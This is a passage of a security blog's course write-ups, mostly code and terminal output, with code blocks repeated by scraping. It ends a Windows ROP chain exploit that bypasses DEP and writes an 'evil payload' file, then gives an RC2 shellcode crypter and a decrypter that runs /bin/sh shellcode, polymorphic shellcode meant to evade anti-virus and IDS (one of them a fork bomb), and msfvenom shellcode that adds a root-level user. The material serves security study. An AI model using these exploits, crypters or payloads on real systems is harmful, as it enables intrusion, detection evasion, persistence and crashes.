buffer += struct.pack('<L', 0x60366238) # ptr to &VirtualProtect() [IAT Configuration.dll]

buffer += struct.pack('<L', 0x6410b24d) # MOV EAX,DWORD PTR DS:[EAX] # RETN [NetReg.dll]

buffer += struct.pack('<L', 0x616385d8) # XCHG EAX,ESI # RETN 0x00 [EPG.dll]

buffer += struct.pack('<L', 0x61626545) # POP EBP # RETN [EPG.dll]

buffer += struct.pack('<L', 0x6035453b) # & push esp # ret 0x10 [Configuration.dll]

buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]

buffer += struct.pack('<L', 0xfffffaff) # value to negate, will become 0x00000501

buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]

buffer += struct.pack('<L', 0x61640124) # XCHG EAX,EBX # RETN [EPG.dll]

buffer += struct.pack('<L', 0x64022e0f) # POP EAX # RETN [MediaPlayerCtrl.dll]

buffer += struct.pack('<L', 0xffffffc0) # value to negate, will become 0x00000040

buffer += struct.pack('<L', 0x64037950) # NEG EAX # RETN [MediaPlayerCtrl.dll]

buffer += struct.pack('<L', 0x61608ba2) # XCHG EAX,EDX # RETN [EPG.dll]

buffer += struct.pack('<L', 0x603636a4) # POP ECX # RETN [Configuration.dll]

buffer += struct.pack('<L', 0x6411cdfc) # &Writable location [NetReg.dll]

buffer += struct.pack('<L', 0x6162c3b0) # POP EDI # RETN [EPG.dll]

buffer += struct.pack('<L', 0x64041804) # RETN (ROP NOP) [MediaPlayerCtrl.dll]

buffer += struct.pack('<L', 0x640390d3) # POP EAX # RETN [MediaPlayerCtrl.dll]

buffer += struct.pack('<L', 0x90909090) # NOP

buffer += struct.pack('<L', 0x60358d9f) # PUSHAD # RETN [Configuration.dll]

buffer += "\x90" * 20

buffer += shellcode

buffer += "\x90" * 20

buffer += "\x43" * (1500-260-(4*25)-40-len(shellcode))

try:

f=open("OpenMe.plf","w")

print "[+] Creating %s bytes evil payload.." %len(buffer)

time.sleep(1)

f.write(buffer)

f.close()

print "[+] File created. Load that shit up!"

except:

print "File cannot be created"

The rest of the assembly code is pretty self-explanatory. Let’s take it for test drive.

The DEP policy which was set to OptOut mode in the above demo has been successfully bypassed! To be complete I also did create an exploit for VirtuallAlloc() which can be found on my Github here.

Conclusion

I hope you’ve learned a thing or two going thru this blog post, keep in mind we’ve only scratched the surface on ROP and I’m sure there are handful of tricks and techniques that I’m not aware of yet. Finally, feel free to correct any inaccurate information I may have provided using the comment section below and wish me luck on my OSCE journey in the near future :D.

RC2 Shellcode Crypter/Decrypter in Python | Linux x86

Introduction

RC2 is a symmetric-key block cipher which was popular in the first half of the 90s of the last century. RC2 also known as ARC2 was designed by Ron Rivest of RSA Security in 1987. Without going into too much details, RC2 consist of block size and key length amongst others things more on that later. In this blog post, we’ll create RC2 shellcode crypter/decrpter to demonstrate the concept. Please note that I’m no RC2 expert and this blog post is by no means an overview of RC2 algorithm

Crypter

In order to create RC2 crypter there is couple of thing we need to figure out ahead of time. That is, key-length which can range from 8 to 1024 bits, cipher-mode which can be either ECB or CBC, and the secret key. We’ll use key length of 128-bits and CBC as cipher mode which require an Initialization Vector. Here’s code referenced from Chilkat, will use the comments section to explain the process

import sys
import chilkat

# Define RC2 parameters
crypt = chilkat.CkCrypt2()
success = crypt.UnlockComponent("Anything for 30-day trial")
if (success != True):
    print(crypt.lastErrorText())
    sys.exit()

crypt.put_CryptAlgorithm("rc2")                                                  # set the encryption algorithm to "rc2"
crypt.put_CipherMode("cbc")                                                      # set cipher mode to "cbc"
crypt.put_KeyLength(128)                                                         # set key length 128-bit
crypt.put_Rc2EffectiveKeyLength(128)                                             #
crypt.put_PaddingScheme(0)                                                       # take care of padding
crypt.put_EncodingMode("hex")                                                    # set encoding mode to HEX
ivHex = "0001020304050607"                                                       # setup initialization vector for CBC mode.
crypt.SetEncodedIV(ivHex,"hex")                                                  # set encoding to HEX
keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"      # set secret key 128-bit
crypt.SetEncodedKey(keyHex,"hex")

# "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80", https://www.exploit-db.com/exploits/43735/
Encrypted_Shellcode = crypt.encryptStringENC("31c05089e2682f2f7368682f62696e89e350b00bcd80")  # encrypt shellcode in string NOT bytearray format
print "Encrypted Shellcode: " + Encrypted_Shellcode                                           # print encrypted shellcode

import sys

import chilkat

# Define RC2 parameters

crypt = chilkat.CkCrypt2()

success = crypt.UnlockComponent("Anything for 30-day trial")

if (success != True):

print(crypt.lastErrorText())

sys.exit()

crypt.put_CryptAlgorithm("rc2") # set the encryption algorithm to "rc2"

crypt.put_CipherMode("cbc") # set cipher mode to "cbc"

crypt.put_KeyLength(128) # set key length 128-bit

crypt.put_Rc2EffectiveKeyLength(128) #

crypt.put_PaddingScheme(0) # take care of padding

crypt.put_EncodingMode("hex") # set encoding mode to HEX

ivHex = "0001020304050607" # setup initialization vector for CBC mode.

crypt.SetEncodedIV(ivHex,"hex") # set encoding to HEX

keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F" # set secret key 128-bit

crypt.SetEncodedKey(keyHex,"hex")

# "\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80", https://www.exploit-db.com/exploits/43735/

Encrypted_Shellcode = crypt.encryptStringENC("31c05089e2682f2f7368682f62696e89e350b00bcd80") # encrypt shellcode in string NOT bytearray format

print "Encrypted Shellcode: " + Encrypted_Shellcode # print encrypted shellcode

Note: the above shellcode basically spawn shell for us and can be found here

Let’s test it

root@ubuntu:~# python RC2Crypter.py 
Encrypted Shellcode: F6F233BA271278F19E34812CC2B7ACD19385C2E7A6D477A4C72E71BF669540944E9E36B252321DB05BD96EE0223E5481
root@ubuntu:~#

root@ubuntu:~# python RC2Crypter.py

Encrypted Shellcode: F6F233BA271278F19E34812CC2B7ACD19385C2E7A6D477A4C72E71BF669540944E9E36B252321DB05BD96EE0223E5481

root@ubuntu:~#

Decrypter

Hence RC2 is a symmetric-key algorithm meaning the same key is used for encryption and decryption, there is nothing much to it really other than reversing the process of encryption. All of the code used to execute shellcode at run time was referenced from here

from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE
import sys
import chilkat

# Define RC2 parameters
crypt = chilkat.CkCrypt2()
success = crypt.UnlockComponent("Anything for 30-day trial")
if (success != True):
    print(crypt.lastErrorText())
    sys.exit()

crypt.put_CryptAlgorithm("rc2")                                                  # set the encryption algorithm to "rc2"
crypt.put_CipherMode("cbc")                                                      # set cipher mode to "cbc"
crypt.put_KeyLength(128)                                                         # set key length 128-bit
crypt.put_Rc2EffectiveKeyLength(128)                                             #
crypt.put_PaddingScheme(0)                                                       # take care of padding
crypt.put_EncodingMode("hex")                                                    # set encoding mode to HEX
ivHex = "0001020304050607"                                                       # setup initialization vector for CBC mode.
crypt.SetEncodedIV(ivHex,"hex")                                                  # set encoding to HEX
keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F"      # set secret key 128-bit
crypt.SetEncodedKey(keyHex,"hex")

# decrypt shellcode, paste encrypted shellcode here
Encrypted_Shellcode = "F6F233BA271278F19E34812CC2B7ACD19385C2E7A6D477A4C72E71BF669540944E9E36B252321DB05BD96EE0223E5481"
Decrypted_Shellcode = crypt.decryptStringENC(Encrypted_Shellcode)                # decrypt shellcode

# execute decrypted shellcode
libc = CDLL('libc.so.6')
shellcode = Decrypted_Shellcode.decode('hex')
sc = c_char_p(shellcode)
size = len(shellcode)
addr = c_void_p(libc.valloc(size))
memmove(addr, sc, size)
libc.mprotect(addr, size, 0x7)
run = cast(addr, CFUNCTYPE(c_void_p))
run()

from ctypes import CDLL, c_char_p, c_void_p, memmove, cast, CFUNCTYPE

import sys

import chilkat

# Define RC2 parameters

crypt = chilkat.CkCrypt2()

success = crypt.UnlockComponent("Anything for 30-day trial")

if (success != True):

print(crypt.lastErrorText())

sys.exit()

crypt.put_CryptAlgorithm("rc2") # set the encryption algorithm to "rc2"

crypt.put_CipherMode("cbc") # set cipher mode to "cbc"

crypt.put_KeyLength(128) # set key length 128-bit

crypt.put_Rc2EffectiveKeyLength(128) #

crypt.put_PaddingScheme(0) # take care of padding

crypt.put_EncodingMode("hex") # set encoding mode to HEX

ivHex = "0001020304050607" # setup initialization vector for CBC mode.

crypt.SetEncodedIV(ivHex,"hex") # set encoding to HEX

keyHex = "000102030405060708090A0B0C0D0E0F101112131415161718191A1B1C1D1E1F" # set secret key 128-bit

crypt.SetEncodedKey(keyHex,"hex")

# decrypt shellcode, paste encrypted shellcode here

Encrypted_Shellcode = "F6F233BA271278F19E34812CC2B7ACD19385C2E7A6D477A4C72E71BF669540944E9E36B252321DB05BD96EE0223E5481"

Decrypted_Shellcode = crypt.decryptStringENC(Encrypted_Shellcode) # decrypt shellcode

# execute decrypted shellcode

libc = CDLL('libc.so.6')

shellcode = Decrypted_Shellcode.decode('hex')

sc = c_char_p(shellcode)

size = len(shellcode)

addr = c_void_p(libc.valloc(size))

memmove(addr, sc, size)

libc.mprotect(addr, size, 0x7)

run = cast(addr, CFUNCTYPE(c_void_p))

run()

Test it

root@ubuntu:~# python RC2Decrypter.py 
# id
uid=0(root) gid=0(root) groups=0(root)
#

root@ubuntu:~# python RC2Decrypter.py

# id

uid=0(root) gid=0(root) groups=0(root)

Its demo time! we’ll use pyinstaller to compile the python script

Closing Thoughts

While researching crypters/decrypters, I found most of the blog posts out there were using C wrappers, so for the sake of not making a redundant one I decided to use python wrapper. This post marks the end of my SLAE journey in which I learned how little did I know and how much I still need to learn. Thank you Vivek Ramachandran and the people who helped make this course available! Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%207

Polymorphic Shellcode | Linux x86

Introduction

Polymorphism is a technique used to mutate code in a way that will keep the original function intact. For example, 1+1 and 4-2 both achieve the same result while using different values and operations. Polymorphic shellcode can aid in efforts to evade anti-virus and IDS/IPS. This post will look at couple shellcodes and how to produce polymorphic version of them.

Shellcode I

The first shellcode we’re going to work with is execve(), which basically spawn shell for us

    *****************************************************
    *    Linux/x86 execve /bin/sh shellcode 23 bytes    *
    *****************************************************
    *	  	  Author: Hamza Megahed		        *
    *****************************************************
    *             Twitter: @Hamza_Mega                  *
    *****************************************************
    *     blog: hamza-mega[dot]blogspot[dot]com         *
    *****************************************************
    *   E-mail: hamza[dot]megahed[at]gmail[dot]com      *
    *****************************************************

xor    %eax,%eax
push   %eax
push   $0x68732f2f
push   $0x6e69622f
mov    %esp,%ebx
push   %eax
push   %ebx
mov    %esp,%ecx
mov    $0xb,%al
int    $0x80

********************************
#include <stdio.h>
#include <string.h>
 
char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
		  "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(shellcode));
(*(void(*)()) shellcode)();
return 0;
}

*****************************************************

* Linux/x86 execve /bin/sh shellcode 23 bytes *

*****************************************************

* Author: Hamza Megahed *

*****************************************************

* Twitter: @Hamza_Mega *

*****************************************************

* blog: hamza-mega[dot]blogspot[dot]com *

*****************************************************

* E-mail: hamza[dot]megahed[at]gmail[dot]com *

*****************************************************

xor %eax,%eax

push %eax

push $0x68732f2f

push $0x6e69622f

mov %esp,%ebx

push %eax

push %ebx

mov %esp,%ecx

mov $0xb,%al

int $0x80

********************************

#include <stdio.h>

#include <string.h>

char *shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"

"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

int main(void)

{

fprintf(stdout,"Length: %d\n",strlen(shellcode));

(*(void(*)()) shellcode)();

return 0;

}

Mutate code and use the comments section to explain the process

Compile and test

falafel@ubuntu:~/Desktop/Execve$ nasm -f elf32 -o Execve.o Execve.nasm
falafel@ubuntu:~/Desktop/Execve$ objdump -d ./Execve.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x31\xc9\xeb\x05\x5b\x04\x0b\xcd\x80\xe8\xf6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68"
falafel@ubuntu:~/Desktop/Execve$ cat Execve.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x31\xc9\xeb\x05\x5b\x04\x0b\xcd\x80\xe8\xf6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}
falafel@ubuntu:~/Desktop/Execve$ gcc -fno-stack-protector -z execstack Execve.c -o Execve
falafel@ubuntu:~/Desktop/Execve$ ./Execve 
Shellcode Length:  24
$ whoami
falafel
$

falafel@ubuntu:~/Desktop/Execve$ nasm -f elf32 -o Execve.o Execve.nasm

"\x31\xc0\x31\xc9\xeb\x05\x5b\x04\x0b\xcd\x80\xe8\xf6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68"

falafel@ubuntu:~/Desktop/Execve$ cat Execve.c

#include<stdio.h>

#include<string.h>

unsigned char code[] = \

"\x31\xc0\x31\xc9\xeb\x05\x5b\x04\x0b\xcd\x80\xe8\xf6\xff\xff\xff\x2f\x2f\x62\x69\x6e\x2f\x73\x68";

void main()

{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

falafel@ubuntu:~/Desktop/Execve$ gcc -fno-stack-protector -z execstack Execve.c -o Execve

falafel@ubuntu:~/Desktop/Execve$ ./Execve

Shellcode Length: 24

$ whoami

falafel

Shellcode II

The second shellcode we’re going to mangle is exit(), this one execute exit function with status code of 1

/* exit-core.c by Charles Stevenson < core@bokeoa.com >  
 *
 * I made this as a chunk you can paste in to make modular remote
 * exploits.  I use it when I need a process to exit cleanly.
 */
char hellcode[] = /*  _exit(1); linux/x86 by core */
// 7 bytes _exit(1) ... 'cause we're nice >:) by core
"\x31\xc0"              // xor  %eax,%eax
"\x40"                  // inc  %eax
"\x89\xc3"              // mov  %eax,%ebx
"\xcd\x80"              // int  $0x80
;

int main(void)
{
  void (*shell)() = (void *)&hellcode;
  printf("%d byte _exit(1); linux/x86 by core\n",
         strlen(hellcode));
  shell();
  return 0;
}

/* exit-core.c by Charles Stevenson < core@bokeoa.com >

* I made this as a chunk you can paste in to make modular remote

* exploits. I use it when I need a process to exit cleanly.

char hellcode[] = /* _exit(1); linux/x86 by core */

// 7 bytes _exit(1) ... 'cause we're nice >:) by core

"\x31\xc0" // xor %eax,%eax

"\x40" // inc %eax

"\x89\xc3" // mov %eax,%ebx

"\xcd\x80" // int $0x80

;

int main(void)

{

void (*shell)() = (void *)&hellcode;

printf("%d byte _exit(1); linux/x86 by core\n",

strlen(hellcode));

shell();

return 0;

}

Mutate code and use the comments section to explain the process

Compile and test

falafel@ubuntu:~/Desktop/Exit$ nasm -f elf32 -o Exit.o Exit.nasm
falafel@ubuntu:~/Desktop/Exit$ objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x6a\x02\x58\x48\x89\xc3\xcd\x80"
falafel@ubuntu:~/Desktop/Exit$ cat Exit.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x6a\x02\x58\x48\x89\xc3\xcd\x80";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}
falafel@ubuntu:~/Desktop/Exit$ gcc -fno-stack-protector -z execstack Exit.c -o Exit
falafel@ubuntu:~/Desktop/Exit$ ./Exit 
Shellcode Length:  8
falafel@ubuntu:~/Desktop/Exit$

falafel@ubuntu:~/Desktop/Exit$ nasm -f elf32 -o Exit.o Exit.nasm

"\x6a\x02\x58\x48\x89\xc3\xcd\x80"

falafel@ubuntu:~/Desktop/Exit$ cat Exit.c

#include<stdio.h>

#include<string.h>

unsigned char code[] = \

"\x6a\x02\x58\x48\x89\xc3\xcd\x80";

void main()

{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

falafel@ubuntu:~/Desktop/Exit$ gcc -fno-stack-protector -z execstack Exit.c -o Exit

falafel@ubuntu:~/Desktop/Exit$ ./Exit

Shellcode Length: 8

falafel@ubuntu:~/Desktop/Exit$

Shellcode III

The third and last shellcode we’re going to deal with is fork(), this one will enter fork loop until system crashes

/* By Kris Katterjohn 8/29/2006
 *
 * 7 byte shellcode for a forkbomb
 *
 *
 *
 * section .text
 *
 *      global _start
 *
 * _start:
 *      push byte 2
 *      pop eax
 *      int 0x80
 *      jmp short _start
 */

main()
{
       char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9";

       (*(void (*)()) shellcode)();
}

/* By Kris Katterjohn 8/29/2006

* 7 byte shellcode for a forkbomb

* section .text

* global _start

* _start:

* push byte 2

* pop eax

* int 0x80

* jmp short _start

main()

{

char shellcode[] = "\x6a\x02\x58\xcd\x80\xeb\xf9";

(*(void (*)()) shellcode)();

}

Mutate code and use the comments section to explain the process

Compile it

falafel@ubuntu:~/Desktop/Fork$ nasm -f elf32 -o ForkBomb.o ForkBomb.nasm
falafel@ubuntu:~/Desktop/Fork$ objdump -d ./ForkBomb.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\x31\xc0\x83\xc0\x02\xcd\x80\xeb\xf7"
falafel@ubuntu:~/Desktop/Fork$ cat ForkBomb.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\x83\xc0\x02\xcd\x80\xeb\xf7";

void main()
{

	printf("Shellcode Length:  %d\n", strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}
falafel@ubuntu:~/Desktop/Fork$ gcc -fno-stack-protector -z execstack ForkBomb.c -o ForkBomb
falafel@ubuntu:~/Desktop/Fork$

falafel@ubuntu:~/Desktop/Fork$ nasm -f elf32 -o ForkBomb.o ForkBomb.nasm

"\x31\xc0\x83\xc0\x02\xcd\x80\xeb\xf7"

falafel@ubuntu:~/Desktop/Fork$ cat ForkBomb.c

#include<stdio.h>

#include<string.h>

unsigned char code[] = \

"\x31\xc0\x83\xc0\x02\xcd\x80\xeb\xf7";

void main()

{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}

falafel@ubuntu:~/Desktop/Fork$ gcc -fno-stack-protector -z execstack ForkBomb.c -o ForkBomb

falafel@ubuntu:~/Desktop/Fork$

Note: Obviously we’re not going to test this one unless we want to crash the system

Closing Thoughts

I chose very simple shellcode examples so we can focus on the concept of polymorphism, hope you learned something from this post. Feel free to contact me for questions using the comment section below or just tweet me @ihack4falafel .

This blog post has been created for completing the requirements of the SecurityTube Linux
Assembly Expert certification:

http://www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: SLAE-1115

Github Repo: https://github.com/ihack4falafel/SLAE32/tree/master/Assignment%206

Disecting Msfvenom Shellcode | Linux x86

Introduction

In this post, we will analyze three samples of Linux x86 based shellcode generated by msfvenom using different tools. Now before going into the next section here’s the list of what is available to us.

root@ubuntu:~# msfvenom -l payloads | grep linux/x86
    linux/x86/adduser                                   Create a new user with UID 0
    linux/x86/chmod                                     Runs chmod on specified file with specified mode
    linux/x86/exec                                      Execute an arbitrary command
    linux/x86/meterpreter/bind_ipv6_tcp                 Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)
    linux/x86/meterpreter/bind_ipv6_tcp_uuid            Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
    linux/x86/meterpreter/bind_nonx_tcp                 Inject the mettle server payload (staged). Listen for a connection
    linux/x86/meterpreter/bind_tcp                      Inject the mettle server payload (staged). Listen for a connection (Linux x86)
    linux/x86/meterpreter/bind_tcp_uuid                 Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)
    linux/x86/meterpreter/find_tag                      Inject the mettle server payload (staged). Use an established connection
    linux/x86/meterpreter/reverse_ipv6_tcp              Inject the mettle server payload (staged). Connect back to attacker over IPv6
    linux/x86/meterpreter/reverse_nonx_tcp              Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter/reverse_tcp                   Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter/reverse_tcp_uuid              Inject the mettle server payload (staged). Connect back to the attacker
    linux/x86/meterpreter_reverse_http                  Run the Meterpreter / Mettle server payload (stageless)
    linux/x86/meterpreter_reverse_https                 Run the Meterpreter / Mettle server payload (stageless)
    linux/x86/meterpreter_reverse_tcp                   Run the Meterpreter / Mettle server payload (stageless)
    linux/x86/metsvc_bind_tcp                           Stub payload for interacting with a Meterpreter Service
    linux/x86/metsvc_reverse_tcp                        Stub payload for interacting with a Meterpreter Service
    linux/x86/read_file                                 Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor
    linux/x86/shell/bind_ipv6_tcp                       Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)
    linux/x86/shell/bind_ipv6_tcp_uuid                  Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)
    linux/x86/shell/bind_nonx_tcp                       Spawn a command shell (staged). Listen for a connection
    linux/x86/shell/bind_tcp                            Spawn a command shell (staged). Listen for a connection (Linux x86)
    linux/x86/shell/bind_tcp_uuid                       Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)
    linux/x86/shell/find_tag                            Spawn a command shell (staged). Use an established connection
    linux/x86/shell/reverse_ipv6_tcp                    Spawn a command shell (staged). Connect back to attacker over IPv6
    linux/x86/shell/reverse_nonx_tcp                    Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell/reverse_tcp                         Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell/reverse_tcp_uuid                    Spawn a command shell (staged). Connect back to the attacker
    linux/x86/shell_bind_ipv6_tcp                       Listen for a connection over IPv6 and spawn a command shell
    linux/x86/shell_bind_tcp                            Listen for a connection and spawn a command shell
    linux/x86/shell_bind_tcp_random_port                Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.
    linux/x86/shell_find_port                           Spawn a shell on an established connection
    linux/x86/shell_find_tag                            Spawn a shell on an established connection (proxy/nat safe)
    linux/x86/shell_reverse_tcp                         Connect back to attacker and spawn a command shell
root@ubuntu:~#

root@ubuntu:~# msfvenom -l payloads | grep linux/x86

linux/x86/adduser Create a new user with UID 0

linux/x86/chmod Runs chmod on specified file with specified mode

linux/x86/exec Execute an arbitrary command

linux/x86/meterpreter/bind_ipv6_tcp Inject the mettle server payload (staged). Listen for an IPv6 connection (Linux x86)

linux/x86/meterpreter/bind_ipv6_tcp_uuid Inject the mettle server payload (staged). Listen for an IPv6 connection with UUID Support (Linux x86)

linux/x86/meterpreter/bind_nonx_tcp Inject the mettle server payload (staged). Listen for a connection

linux/x86/meterpreter/bind_tcp Inject the mettle server payload (staged). Listen for a connection (Linux x86)

linux/x86/meterpreter/bind_tcp_uuid Inject the mettle server payload (staged). Listen for a connection with UUID Support (Linux x86)

linux/x86/meterpreter/find_tag Inject the mettle server payload (staged). Use an established connection

linux/x86/meterpreter/reverse_ipv6_tcp Inject the mettle server payload (staged). Connect back to attacker over IPv6

linux/x86/meterpreter/reverse_nonx_tcp Inject the mettle server payload (staged). Connect back to the attacker

linux/x86/meterpreter/reverse_tcp Inject the mettle server payload (staged). Connect back to the attacker

linux/x86/meterpreter/reverse_tcp_uuid Inject the mettle server payload (staged). Connect back to the attacker

linux/x86/meterpreter_reverse_http Run the Meterpreter / Mettle server payload (stageless)

linux/x86/meterpreter_reverse_https Run the Meterpreter / Mettle server payload (stageless)

linux/x86/meterpreter_reverse_tcp Run the Meterpreter / Mettle server payload (stageless)

linux/x86/metsvc_bind_tcp Stub payload for interacting with a Meterpreter Service

linux/x86/metsvc_reverse_tcp Stub payload for interacting with a Meterpreter Service

linux/x86/read_file Read up to 4096 bytes from the local file system and write it back out to the specified file descriptor

linux/x86/shell/bind_ipv6_tcp Spawn a command shell (staged). Listen for an IPv6 connection (Linux x86)

linux/x86/shell/bind_ipv6_tcp_uuid Spawn a command shell (staged). Listen for an IPv6 connection with UUID Support (Linux x86)

linux/x86/shell/bind_nonx_tcp Spawn a command shell (staged). Listen for a connection

linux/x86/shell/bind_tcp Spawn a command shell (staged). Listen for a connection (Linux x86)

linux/x86/shell/bind_tcp_uuid Spawn a command shell (staged). Listen for a connection with UUID Support (Linux x86)

linux/x86/shell/find_tag Spawn a command shell (staged). Use an established connection

linux/x86/shell/reverse_ipv6_tcp Spawn a command shell (staged). Connect back to attacker over IPv6

linux/x86/shell/reverse_nonx_tcp Spawn a command shell (staged). Connect back to the attacker

linux/x86/shell/reverse_tcp Spawn a command shell (staged). Connect back to the attacker

linux/x86/shell/reverse_tcp_uuid Spawn a command shell (staged). Connect back to the attacker

linux/x86/shell_bind_ipv6_tcp Listen for a connection over IPv6 and spawn a command shell

linux/x86/shell_bind_tcp Listen for a connection and spawn a command shell

linux/x86/shell_bind_tcp_random_port Listen for a connection in a random port and spawn a command shell. Use nmap to discover the open port: 'nmap -sS target -p-'.

linux/x86/shell_find_port Spawn a shell on an established connection

linux/x86/shell_find_tag Spawn a shell on an established connection (proxy/nat safe)

linux/x86/shell_reverse_tcp Connect back to attacker and spawn a command shell

root@ubuntu:~#

Shellcode I

The first shellcode we’ll look at is adduser, the following are the options that needs to be feed into the payload

root@ubuntu:~# msfvenom -p linux/x86/adduser --payload-options
Options for payload/linux/x86/adduser:


       Name: Linux Add User
     Module: payload/linux/x86/adduser
   Platform: Linux
       Arch: x86
Needs Admin: Yes
 Total size: 97
       Rank: Normal

Provided by:
    skape <mmiller@hick.org>
    vlad902 <vlad902@gmail.com>
    spoonm <spoonm@no$email.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
PASS   metasploit       yes       The password for this user
SHELL  /bin/sh          no        The shell for this user
USER   metasploit       yes       The username to create

Description:
  Create a new user with UID 0

root@ubuntu:~# msfvenom -p linux/x86/adduser --payload-options

Options for payload/linux/x86/adduser:

Name: Linux Add User

Module: payload/linux/x86/adduser

Platform: Linux

Arch: x86

Needs Admin: Yes

Total size: 97

Rank: Normal

Provided by:

skape <mmiller@hick.org>

vlad902 <vlad902@gmail.com>

spoonm <spoonm@no$email.com>

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASS metasploit yes The password for this user

SHELL /bin/sh no The shell for this user

USER metasploit yes The username to create

Description:

Create a new user with UID 0

Generating shellcode

root@ubuntu:~# msfvenom -p linux/x86/adduser USER=hax0r PASS=falafelislife -f c -v shellcode
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 92 bytes
Final size of c file: 419 bytes
unsigned char shellcode[] = 
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x23\x00\x00\x00\x68\x61"
"\x78\x30\x72\x3a\x41\x7a\x45\x56\x62\x31\x4a\x43\x50\x47\x31"
"\x49\x51\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f"
"\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58"
"\xcd\x80";
root@ubuntu:~#

root@ubuntu:~# msfvenom -p linux/x86/adduser USER=hax0r PASS=falafelislife -f c -v shellcode

No platform was selected, choosing Msf::Module::Platform::Linux from the payload

No Arch selected, selecting Arch: x86 from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 92 bytes

Final size of c file: 419 bytes

unsigned char shellcode[] =

"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"

"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"

"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x23\x00\x00\x00\x68\x61"

"\x78\x30\x72\x3a\x41\x7a\x45\x56\x62\x31\x4a\x43\x50\x47\x31"

"\x49\x51\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f"

"\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58"

"\xcd\x80";

root@ubuntu:~#

Compile and test

root@ubuntu:~# gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
root@ubuntu:~# ./shellcode 
root@ubuntu:~# cat /etc/passwd | grep hax0r
